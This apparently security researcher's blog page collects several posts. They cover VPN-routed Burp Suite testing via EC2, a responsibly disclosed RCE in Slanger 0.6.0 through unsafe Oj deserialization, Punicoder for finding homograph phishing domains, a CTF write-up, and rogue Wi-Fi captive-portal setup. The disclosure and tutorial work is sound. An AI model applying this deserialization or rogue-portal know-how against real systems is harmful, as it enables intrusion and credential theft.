  2. Testing public assets from a whitelisted environment, e.g. web applications that are usually hidden behind a WAF, applications that are internet-accessible, but only available to a number of whitelisted networks, etc;
  3. Bug bounty programs that require the use of their VPN as a condition to participate in the program.

To accommodate this need, you may be inclined to install an OpenVPN client on your local testing machine and get going. While this definitely works, I found that separating my testing activities from other network activity is not only a privacy-conscious decision, but also helps towards freeing up as much of the VPN bandwidth as is possible, because now it is no longer occupied with superfluous traffic.

The setup

Architecturally, the solution that I will describe looks like this:

High-level diagram of proxying traffic through a VPN using Burp Suite.

VPN tunnel

The VPN tunnel is of course the core of this setup, and will allow you to tunnel your (selected) traffic either towards assets inside a target’s environment, or towards internet-accessible assets, but originating from the target’s network. In other words, the web applications you are testing will see you coming from Target X’s IP address range, rather than from your own.

Jump host

If you have a static IP on your home or office network, or this is intended as a temporary setup (i.e. your current IP will do), you can skip this.

Otherwise, this jump host will serve as a bridge towards your VPN-connected EC2 instance. Most importantly, the VPS’s static IP will allow us to configure the traffic to and from this jump host to avoid being sent over the VPN.

On this jump host, make sure you have access to the EC2 instance’s private key (if applicable), and set up a SOCKS proxy using the following command:

ssh -i ~/ssh-private-key.pem -D 2222 [email protected]

This will set up an SSH tunnel that will redirect all traffic proxied through port 2222 on the jump host, towards the original destination via the AWS EC2 instance (i.e. through the VPN when the VPN is activated).

AWS EC2 instance

Because it’s cheap, I opted for a t2.micro instance in AWS EC2 to set up the connection with the VPN. I am a fan of Debian, so I spun up an Ubuntu 18.04 image. Once up and running, you will need the following configured:

  • Install OpenVPN;
  • Upload the ovpn file containing the config of the VPN you want to connect to;
  • Whitelist your jump host (or home/office IP) from the VPN by directing traffic through the usual gateway (source);
  • Whitelist any local DNS servers if needed;
# install OpenVPN client
sudo apt install openvpn

# find out and write down your local gateway's IP address
netstat -anr

# find out and write down your local DNS servers' IP addresses
# (I needed this to allow DNS resolution in AWS EC2 when the VPN is running)
systemd-resolve --status

# Make sure both IPs you wrote down are not redirected through the VPN:
sudo route add -host <your-jumphost-ip> gw <your-local-gateway>
sudo route add -host <your-local-dns-server> gw <your-local-gateway>

# Start the VPN!
sudo openvpn --config ./openvpn-config.ovpn --daemon

Local configuration

The final steps to get this to work are:

  1. Set up local port forwarding to the SOCKS proxy on your jump host;
  2. Configure Burp Suite to use the forwarded local port as a SOCKS proxy;
  3. Use the ProxySwitch browser extension to send only selected sites towards Burp Suite and through the VPN

On Windows, using PuTTY, you can use the following configuration to forward local port 31337 to your jump host on port 2222:

Note that “localhost” in this screenshot is relative to the remote server.

In Burp Suite, go to either User Options or Project Options, and configure SOCKS proxy to point to your localhost on port 31337:

Finally, point your Switchy Omega to your Burp proxy for selected sites:


Before kicking off your tests, I recommend you verify the value of your public IP that is displayed when browsing to a site like ifconfig.co or ipchicken.com with your proxy enabled.

Pros / cons

The described setup has a few (dis)advantages worth mentioning:

Pros

  • Reserve the VPN bandwidth to testing activities only, which can considerably improve your connection speed over a sometimes shaky VPN;
  • Separate your “background” network traffic from the VPN traffic, ensuring your privacy isn’t at risk when testing from your personal device;
  • The AWS EC2 instance can be shut down in-between tests, ensuring your bill doesn’t keep growing overnight;
  • You can configure multiple devices to connect through a single VPN connection by pointing them to the same SOCKS proxy on the jump host.

Cons

  • The setup is slightly more convoluted than just running your OpenVPN client on your local machine;
  • In case of a failing VPN connection on the AWS EC2 instance, you may be executing tests outside of the VPN-ed environment without you noticing;
  • When configuring per-domain proxy settings, web application traffic that hits other domains will not be proxied, possibly leading to unexpected results.

I’d love to hear your thoughts on this! Did you use a similar approach? Do you have suggestions to improve or simplify this setup? Let me know in the comments below.

RCE in Slanger, a Ruby implementation of Pusher

While researching a web application last February, I learned about Slanger, an open source server implementation of Pusher. In this post I describe the discovery of a critical RCE vulnerability in Slanger 0.6.0, and the efforts that followed to responsibly disclose the vulnerability.

SECURITY NOTICE – If you are making use of Slanger in your products, stop reading and get your security fix first! A patch is available on GitHub or as part of the Ruby gem in version 0.6.1.

Pusher vs. Slanger

Pusher is a product that provides a number of libraries to enable the use of WebSockets in a variety of programming languages. WebSockets, according to their website, “represent a standard for bi-directional realtime communication between servers and clients.”

Some of the functionalities offered by Pusher are subscribing and unsubscribing to public and private channels. For example, the following WebSocket request would result in a user subscribing to the channel “presence-example-channel”:

{
  "event": "pusher:subscribe",
  "data": {
    "channel": "presence-example-channel",
    "auth": "<APP_KEY>:<server_generated_signature>",
    "channel_data": "{
      \"user_id\": \"<unique_user_id>\",
      \"user_info\": {
        \"name\": \"Phil Leggetter\",
        \"twitter\": \"@leggetter\",
        \"blogUrl\":\"http://blog.pusher.com\"
      }
    }"
  }
}

While researching a web application, I learned about Slanger, an open-source Ruby implementation that “speaks” the Pusher protocol. In other words, it is a free alternative to Pusher that can be spun up as a stand-alone server in order to accept and process messages like the example above. At the time of writing, the vulnerable library has over 45,000 downloads on Rubygems.org.

I was able to determine what library was being used when the following error message was returned in response to my invalid input:

Request

socket = new WebSocket("wss://push.example.com/app/<app-id>?");
socket.send("test")

Response

{"event":"pusher:error","data":"{\"code\":500,\"message\":\"expected true at line 1, column 2 [parse.c:148]\\n /usr/local/rvm/gems/ruby-2.3.0/gems/slanger-0.6.0/lib/slanger/handler.rb:28:in `load'\\n/usr/local/rvm/gems/ruby-2.3.0/gems/slanger-0.6.0/lib/slanger/handler.rb:28:in `onmessage'\\n/usr/local/rvm/gems/ruby-2.3.0/gems/slanger-0.6.0/lib/slanger/web_socket_server.rb:30:in `block (3 levels) in run'\\n/usr/local/rvm/gems/ruby-2.3.0/gems/em-websocket-0.5.1/lib/em-websocket/connection.rb:18:in `trigger_on_message'\\n/usr/local/rvm/gems/ruby-2.3.0/gems/em-websocket-0.5.1/lib/em-websocket/message_processor_06.rb:52:in `message'\\n/usr/local/rvm/gems/ruby-2.3.0/gems/em-websocket-0.5.1/lib/em-websocket/framing07.rb:118:in `process_data'\\n/usr/local/rvm/gems/ruby-2.3.0/gems/em-websocket-0.5.1/lib/em-websocket/handler.rb:47:in `receive_data'\\n/usr/local/rvm/gems/ruby-2.3.0/gems/em-websocket-0.5.1/lib/em-websocket/connection.rb:76:in `receive_data'\\n/usr/local/rvm/gems/ruby-2.3.0/gems/eventmachine-1.0.9.1/lib/eventmachine.rb:193:in `run_machine'\\n/usr/local/rvm/gems/ruby-2.3.0/gems/eventmachine-1.0.9.1/lib/eventmachine.rb:193:in `run'\\n/usr/local/rvm/gems/ruby-2.3.0/gems/slanger-0.6.0/bin/slanger:106:in `<main>'\"}"}

Note the occurrence of gem slanger-0.6.0, which appears to point to this open source Ruby project on GitHub. Having all the source code at my disposition, my attention was drawn to the file handler.rb that contained the following function responsible for handling incoming WebSocket messages:

def onmessage(msg)
   msg = Oj.load(msg)
   msg['data'] = Oj.load(msg['data']) if msg['data'].is_a? String
   event = msg['event'].gsub(/\Apusher:/, 'pusher_')
   if event =~ /\Aclient-/
      msg['socket_id'] = connection.socket_id
      Channel.send_client_message msg
   elsif respond_to? event, true
      send event, msg
end

Since msg is the string that comes from the user’s end of the two-way communication, that gives us considerable control over this function. In particular, when trying to understand what Oj.load is supposed to do, this code started to look promising — from an attacker’s perspective.

Ruby unmarshalling

As it turns out, Oj (short for “Optimized JSON”) is a “fast JSON parser and Object marshaller as a Ruby gem.” Now that is interesting. From earlier experience, I knew that Ruby marshalling can lead to remote code execution vulnerabilities.

From online documentation, I learned that Oj allows serialization and deserialization of Ruby objects by default. For example, the following string is the result of an object of the class Sample::Doc being serialized with Oj.dump(sample).

{"^o":"Sample::Doc","title":"Sample","user":"ohler","create_time":{"^t":1371361533.272099000},"layers":{},"change_history":[{"^o":"Sample::Change","user":"ohler","time":{"^t":1371361533.272106000},"comment":"Changed at t+0."}],"props":{":purpose":"an example"}}

So presumably, passing a similarly serialized object via socket.send(...) should result in our input being “unmarshalled” by the underlying code in Slanger. All that now stands between an attacker’s input and remote code execution, is the availability of classes and objects that can be manipulated into executing system commands.

Since the Ruby gem appears to have a dependency on the Rails environment, I could build on earlier work by Charlie Somerville to construct a working payload that would lead to remote command execution in two different ways, one of which did not require knowing the app key. See the exploit in action in the video below.

Continue reading on the next page for an account of how I tried to responsibly disclose this bug.

A lot of coffee went into the writing of this article. If it helped you stay secure, please consider buying me a coffee, or invite me to your bug bounty program. 🙂

Buy me a coffeeBuy me a coffee

From blind XXE to root-level file read access

Polyphemus, by Johann Heinrich Wilhelm Tischbein, 1802 (Landesmuseum Oldenburg)

On a recent bug bounty adventure, I came across an XML endpoint that responded interestingly to attempted XXE exploitation. The endpoint was largely undocumented, and the only reference to it that I could find was an early 2016 post from a distraught developer in difficulties.

Below, I will outline the thought process that helped me make sense of what I encountered, and that in the end allowed me to elevate what seemed to be a medium-criticality vulnerability into a critical finding.

I will put deliberate emphasis on the various error messages that I encountered in the hope that it can point others in the right direction in the future.

Note that I have anonymised all endpoints and other identifiable information, as the vulnerability was reported as part of a private disclosure program, and the affected company does not want any information regarding their environment or this finding to be published.

Continue reading

Punicoder – discover domains that are phishing you

So we’re seeing homograph attacks again. Examples show how ‘apple.com’ and ‘epic.com’ can be mimicked by the use of Internationalized Domain Names (IDN) consisting entirely of unicode characters, i.e. xn--80ak6aa92e.com and xn--e1awd7f.com respectively.

As I found myself looking for ways to discover domain names that could be used for phishing attempts, I created a Python script called Punicoder to do the hard work for me. See the screenshot below for example output, and try it out for yourself here.

Punicoder output

Pro tip: use the following series of commands to find out if any of these domains resolve:

pieter@ubuntu:~$ python punicoder.py google.com | cut -d' ' -f2 | nslookup | grep -Pzo '(?s)Name:\s(.*?)Address: (.*?).Server'
Name: xn--oogle-qmc.com
Address: 185.53.178.7
Server
Name: xn--gogl-0nd52e.com
Address: 216.239.32.27
Server
Name: xn--gogl-1nd42e.com
Address: 216.239.32.27
Server
Name: xn--oole-z7bc.com
Address: 50.63.202.59
Server
Name: xn--goole-tmc.com
Address: 75.119.220.238
Server
Name: xn--ggle-55da.com
Address: 216.239.32.27
Server

Hack.lu 2015: Creative Cheating

Write-up of Hack.lu 2015’s Creative Cheating challenge.

The first challenge I solved on Hack.lu 2015, hosted by FluxFingers, was Creative Cheating.

The challenge

Mr. Miller suspects that some of his students are cheating in an automated computer test. He captured some traffic between crypto nerds Alice and Bob. It looks mostly like garbage but maybe you can figure something out. He knows that Alice’s RSA key is (n, e) = (0x53a121a11e36d7a84dde3f5d73cf, 0x10001) (192.168.0.13) and Bob’s is (n, e) = (0x99122e61dc7bede74711185598c7, 0x10001) (192.168.0.37)

The solution

Upon inspection of the packet capture, we notice every packet from Alice (192.168.0.13) to Bob (192.168.0.37) contains a base64-encoded payload. E.g.

U0VRID0gNDsgREFUQSA9IDB4MmMyOTE1MGYxZTMxMWVmMDliYzlmMDY3MzVhY0w7IFNJRyA9IDB4MTY2NWZiMmRhNzYxYzRkZTg5ZjI3YWM4MGNiTDs=

Continue reading

How to set up a Wifi captive portal

Goals

The objective of this Wifi captive portal is to mimic the behaviour of a legitimate access point protected by a portal login page for demonstrational purposes. That includes the following:

  • Broadcast a rogue access point
  • Mimic captive portal behaviour:
    • User gets to see a login page when trying to connect;
    • After logging in, the user can continue to access the network and surf freely.

Continue reading